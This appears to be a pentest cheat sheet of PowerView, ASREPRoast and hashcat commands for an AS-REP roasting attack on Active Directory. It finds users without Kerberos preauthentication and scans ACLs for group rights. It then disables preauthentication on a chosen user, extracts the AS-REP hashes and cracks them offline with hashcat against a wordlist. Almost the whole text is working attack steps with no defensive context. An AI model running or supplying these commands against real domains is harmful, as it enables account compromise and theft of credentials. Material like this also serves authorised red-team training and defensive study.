. .\Powerview_dev.ps1
Get-DomainUser -PreauthNotRequired -Verbose
Get-DomainUser -PreauthNotRequired -verbose | select samaccountname
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match ā<groupname>ā}
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match ā<groupname>ā} | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl
. ./PowerView_dev.ps1
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
. ./ASREPRoast.ps1
Get-ASREPHash -Username <username> -Verbose
Invoke-ASREPRoast -Verbose
Invoke-ASREPRoast -Verbose | fl
Edit the hash by inserting '23' after the krb5asrep, so krb5asrep.......
Hashcat -a 0 -m 18200 hash.txt rockyou.txt